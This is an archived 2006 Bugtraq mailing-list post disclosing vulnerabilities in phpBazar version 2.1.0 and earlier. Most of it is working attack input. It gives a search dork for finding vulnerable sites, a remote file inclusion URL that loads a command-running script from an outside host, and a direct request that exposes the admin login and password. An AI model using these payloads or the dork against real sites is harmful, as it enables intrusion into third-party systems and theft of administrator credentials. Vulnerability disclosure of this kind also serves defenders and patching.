lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060520120635.4051.qmail@securityfocus.com> Date: 20 May 2006 12:06:35 -0000 From: i6d@...mail.com To: bugtraq@...urityfocus.com Subject: phpBazar <= 2.1.0 Multiple vulnerabilites Title: phpBazar <= 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password: /admin/admin.php?action=edit_member&value=1 # Found By PHP Emperor